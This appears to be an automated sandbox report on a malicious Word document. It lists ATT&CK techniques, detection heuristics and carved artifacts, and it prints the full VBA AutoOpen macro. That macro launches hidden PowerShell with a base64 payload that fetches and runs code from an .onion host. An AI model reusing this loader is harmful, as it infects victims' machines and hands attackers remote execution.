MALICIOUS
352
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1140 Deobfuscate/Decode Files or Information
T1071.001 Web Protocols
The sample is a malicious OOXML document containing VBA macros. The AutoOpen macro utilizes WScript.Shell and references PowerShell, indicating an attempt to download and execute a second-stage payload. The script also appears to interact with registry keys related to persistence, specifically 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. The presence of these elements strongly suggests a downloader or dropper functionality.
Heuristics 9
-
ClamAV: Doc.Virus.Pwshell-6755238-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Virus.Pwshell-6755238-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set a = CreateObject("WScript.Shell") -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
a.Run "powershell.exe" & " -noexit -encodedcommand " & b, 0, False -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set a = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6640 bytes |
SHA-256: 5517fd1733f260834acab272e253b3217cb8aadfbf73e86f663bf51634fb5c25 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
b = "JwBMAFgAVQBuAGYAcQBuACcAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnADsAJwBKAGwAbgBsACcAOwAnAHIAWAByAFAARwBnAGcAYgAnADsAJABiAHkAIAA9ACAAKABnAGUAdAAtAHcAbQBpAG8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtAFAAcgBvAGQAdQBjAHQAKQAuAFUAVQBJAEQAOwAnAGsAagBFAHYAaQBzAE0AcgAnADsAJwBCAGwAdwBGAEsAegBIAGcAeAAnADsAaQBmACAAKAAoAGcAcAAgAEgASwBDAFUAOgBcAFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AKQAgAC0AbQBhAHQAYwBoACAAJABiAHkAKQB7ADsAJwBCAHIATwBaAFkATABGAFYAWQAnADsAJwBpAGgAegBuAGsAbgBmAHQAYwBSAEwAJwA7ACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAHAAaQBkACkALgBLAGkAbABsACgAKQA7ACcAZQBNAEIAbgBCAFc" _
& "AQwAnADsAJwBDAGwATQBDAHYAbgBHAHoAJwA7AH0AOwAnAGsARgBxAGIARQBSAGoAYwBhAEsAJwA7ACcAYwBaAGQAZQBmAHYAJwA7AGYAdQBuAGMAdABpAG8AbgAgAGUAKAAkAG8AaABkACkAewA7ACcAZAByAFMAegBVAFMAcgBkACcAOwAnAEoAdgBGAGQAJwA7ACQAbQB0AGsAIAA9ACAAKAAoACgAaQBlAHgAIAAiAG4AcwBsAG8AbwBrAHUAcAAgAC0AcQB1AGUAcgB5AHQAeQBwAGUAPQB0AHgAdAAgACQAbwBoAGQAIAA4AC4AOAAuADgALgA4ACIAKQAgAC0AbQBhAHQAYwBoACAAJwAiACcAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcAIgAnACwAIAAnACcAKQBbADAAXQAuAFQAcgBpAG0AKAApADsAJwB3AEgAcABXAEkAUABaACcAOwAnAHIAWgBPAG0AeQBUACcAOwAkAGkAbAB1AGEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbQB0AGsALAAgACQAYgBxAHYAdAApADsAJwBLAHEAcgBQAFkAJwA7ACcAdABDAGcATQBzACcAOwAkAHcAcwAgAD0AIAAkAHgAeQB1AC4ATgBhAG0AZQBTAHAAYQBjAGUAKAAkAGIAcQB2AHQAKQAuAEkAdABlAG0AcwAoACkAOwAnAEQAVgBSAFoAQwBNAFgAbgAnADsAJwBhAFYATQB1AE" _
& "EAeQBtAEMARABvACcAOwAkAHgAeQB1AC4ATgBhAG0AZQBTAHAAYQBjAGUAKAAkAGUAegBwAHIAKQAuAEMAbwBwAHkASABlAHIAZQAoACQAdwBzACwAIAAyADAAKQA7ACcATgBvAFkAYQBUAE0AZwBXAFYAJwA7ACcAVwBjAHoAbABhAGYARgBIAEkAJwA7AHIAZAAgACQAYgBxAHYAdAA7ACcAQQBKAGMAJwA7ACcAUgBsACcAOwB9ADsAJwBtAHcAUABWACcAOwAnAFgAWQBTACcAOwAnAGIAUwBSAGsATQAnADsAJwBHAEYAZQBaAEsAZQBNAHkAJwA7ACcAVgB0ACcAOwAnAGIAbABXAHYAeABFAFkAZABCACcAOwAkAGUAegBwAHIAIAA9ACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAIAArACAAJwBcACcAIAArACAAJABiAHkAOwAnAEgAVABDACcAOwAnAHoAZwBPAHcAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABlAHoAcAByACkAKQB7ADsAJwBmAEEAWABLAGoAYQB1ACcAOwAnAGsARQBYAHgAJwA7ACQAdgBwAGoAcQAgAD0AIABOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBGAG8AcgBjAGUAIAAtAFAAYQB0AGgAIAAkAGUAegBwAHIAOwAnA" _
& "EcAVwBTAGIAQQAnADsAJwB2AE8AdgByAGEAJwA7ACQAdgBwAGoAcQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAIgBIAGkAZABkAGUAbgAiACwAIAAiAFMAeQBzAHQAZQBtACIALAAgACIATgBvAHQAQwBvAG4AdABlAG4AdABJAG4AZABlAHgAZQBkACIAOwAnAGEAbQBQAEMARwB5ACcAOwAnAEUASwBGAE0AJwA7AH0AOwAnAHMAQgAnADsAJwBSAFIAaQBJAFkAegAnADsAJwBiAHYAYwBDAGUAVABlAEwAVwAnADsAJwBOAGMATwBUAFkAbwBsAEMASQBCACcAOwAkAHYAdAB6AGcAPQAkAGUAegBwAHIAKwAgACcAXAB0AG8AcgAuAGUAeABlACcAOwAnAFIAbwBxAHMAdQBYAEUAJwA7ACcAZgBRAEcAQgBXAEcAdwB0ACcAOwAkAG8AdAA9ACQAZQB6AHAAcgArACAAJwBcAHAAbwBsAGkAcABvAC4AZQB4AGUAJwA7ACcASABYAEsAcwBSAGkAdgBmACcAOwAnAG8AeQBuAE4AYwBlAE8AbgBGAHgAeQAnADsAJABiAHEAdgB0AD0AJABlAHoAcAByACsAJwBcACcAKwAkAGIAeQArACcALgB6AGkAcAAnADsAJwBEAEoAbAByAEIAQgBaAFMAJwA7ACcASABsAEIAWgAnADsAJABpAGwAdQBhAD0ATgBlAHcALQBPAGIAagBlAGMAdAAg" _
& "AFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACcAUQBEAGMAcAB5ACcAOwAnAFEASgB4AGYAJwA7ACQAeAB5AHUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJwB4AGUAUwB1ACcAOwAnAEIARQBKAGIAVQAnADsAJwBCAHQAbgBKAEsAVQBTAG0AJwA7ACcASAB1AEcAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB2AHQAegBnACkAIAAtAG8AcgAgACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAbwB0ACkAKQB7ADsAJwBjAHgAagBCAE8AbQBaAHYARABrACcAOwAnAE4ASQBuAG4AJwA7AGUAIAAnAGkALgB2AGEAbgBrAGkAbgAuAGQAZQAnADsAJwBDAE8AWQBWAFgAUABEACcAOwAnAFEATABpAGsAVwBvAGQAVwBUACcAOwB9ADsAJwBuAGwASABTAGMASwAnADsAJwB0AEwAVgBXAHUAJwA7ACcARABHAFoASQBuAHMAdwBqACcAOwAnAGkAZQBhAHEAQgBuAFgAWABCAEwAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB2AHQAegBnACkAIAAtAG8AcgAgACEAKABUAGUAcwB0AC0AUAB" _
& "hAHQAaAAgACQAbwB0ACkAKQB7ADsAJwBUAGcAYQAnADsAJwByAFUARgBRAGkAJwA7AGUAIAAnAGcAZwAuAGkAYgBpAHoALgBjAGMAJwA7ACcATABWAFMAcQBkAHMAJwA7ACcATQBrAGkAUwBRAEwAVgBKAHkAJwA7AH0AOwAnAHMARgBVAE0AdwBSAFEAagAnADsAJwBEAFoAJwA7ACcAZABiACcAOwAnAE4AbQBWAFgAagBaAGEATwAnADsAJABjAHYAZAB6AD0AJABlAHoAcAByACsAJwBcAHIAbwBhAG0AaQBuAGcAbABvAGcAJwA7ACcATABVAFAAcQAnADsAJwBnAEsAUQBnAEwAbQBZAGgAJwA7AHMAYQBwAHMAIAAkAHYAdAB6AGcAIAAtAEEAcgAgACIAIAAtAC0ATABvAGcAIABgACIAbgBvAHQAaQBjAGUAIABmAGkAbABlACAAJABjAHYAZAB6AGAAIgAiACAALQB3AGkAIABIAGkAZABkAGUAbgA7ACcAUABaAHgAbgBDAEkAJwA7ACcAcwBvAFMAeQBGAFMAeAB6ACcAOwBkAG8AewBzAGwAZQBlAHAAIAAxADsAJABiAGkAbQB5AD0AZwBjACAAJABjAHYAZAB6AH0AdwBoAGkAbABlACgAIQAoACQAYgBpAG0AeQAgAC0AbQBhAHQAYwBoACAAJwBCAG8AbwB0AHMAdAByAGEAcABwAGUAZAAgADEAMAAwACUAOgAgAEQAbwBuAGUALg" _
& "AnACkAKQA7ACcATQBEAE4AaABvAFoAeABFACcAOwAnAEcAdQBNAHUAegBvAEMAdwBUACcAOwBzAGEAcABzACAAJABvAHQAIAAtAGEAIAAiAHMAbwBjAGsAcwBQAGEAcgBlAG4AdABQAHIAbwB4AHkAPQBsAG8AYwBhAGwAaABvAHMAdAA6ADkAMAA1ADAAIgAgAC0AdwBpACAASABpAGQAZABlAG4AOwAnAGMAZgByAHcAUABjACcAOwAnAEQAbABuAHoAeQB2AHcAQgBZAFEAJwA7AHMAbABlAGUAcAAgADcAOwAnAFQAQQB0AFMAQwB5ACcAOwAnAE4AZwBUAGkAJwA7ACQAcQBkAGEAeAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5ACgAIgBsAG8AYwBhAGwAaABvAHMAdAA6ADgAMQAyADMAIgApADsAJwBBAHgAcABrACcAOwAnAHkAWQBlAFAAdwB3ACcAOwAkAHEAZABhAHgALgB1AHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIAAkAHQAcgB1AGUAOwAnAEsAYwBxAEwASABYAFgATgB4AFEAcwAnADsAJwBtAEIAVQBrAE4AZgB3AHMAZgBpAFgAJwA7ACQAaQBsAHUAYQAuAHAAcgBvAHgAeQA9ACQAcQBkAGEAeAA7ACcATgBuAFYAb" _
& "ABVAGEAagBjAGgAJwA7ACcAdABnAGkAegBBAEcAUgBDAEUAWABxACcAOwAkAHAAYgB0AHgAPQAnAGgAdAB0AHAAOgAvAC8AcABvAHcAZQByAHcAbwByAG0AagBxAGoANAAyAGgAdQAuAG8AbgBpAG8AbgAvAGcAZQB0AC4AcABoAHAAPwBzAD0AcwBlAHQAdQBwACYAbQBvAG0APQAwADcANwA2AEIAMgAwADEALQA1ADEARABFAC0AMQAxAEMAQgAtAEEANwA4AEMALQA5AEMAMQBGADIANgBEADcANQBGAEIAOQAmAHUAaQBkAD0AJwAgACsAIAAkAGIAeQA7ACcAegBsACcAOwAnAHIASQBJAHYAQgBiAHkARgBuACcAOwB3AGgAaQBsAGUAKAAhACQAbgByAGMAYgApAHsAJABuAHIAYwBiAD0AJABpAGwAdQBhAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABwAGIAdAB4ACkAfQA7ACcAVgBXAE0AJwA7ACcAVQBBAHEAUwAnADsAaQBmACAAKAAkAG4AcgBjAGIAIAAtAG4AZQAgACcAbgBvAG4AZQAnACkAewA7ACcAeQB5AGUAWQBmAG0AeABwAHMAcwAnADsAJwBlAFQAJwA7AGkAZQB4ACAAJABuAHIAYwBiADsAJwBvAEQAJwA7ACcASgBxAEUAZQBzAEQAcABnAGIASQAnADsAfQA7ACcAWQBzAEcAagB6AGIATgBiAGgA" _
& "SQB3ACcAOwA="
Set a = CreateObject("WScript.Shell")
a.Run "powershell.exe" & " -noexit -encodedcommand " & b, 0, False
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 17920 bytes |
SHA-256: 59d613152636c4ad21d4ff02c22338587578f3c53caa440d704d6ae090a71e92 |
|||
|
Detection
ClamAV:
Doc.Virus.Pwshell-6755238-0
Obfuscation or payload:
likely
Carved artifact contains 8 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.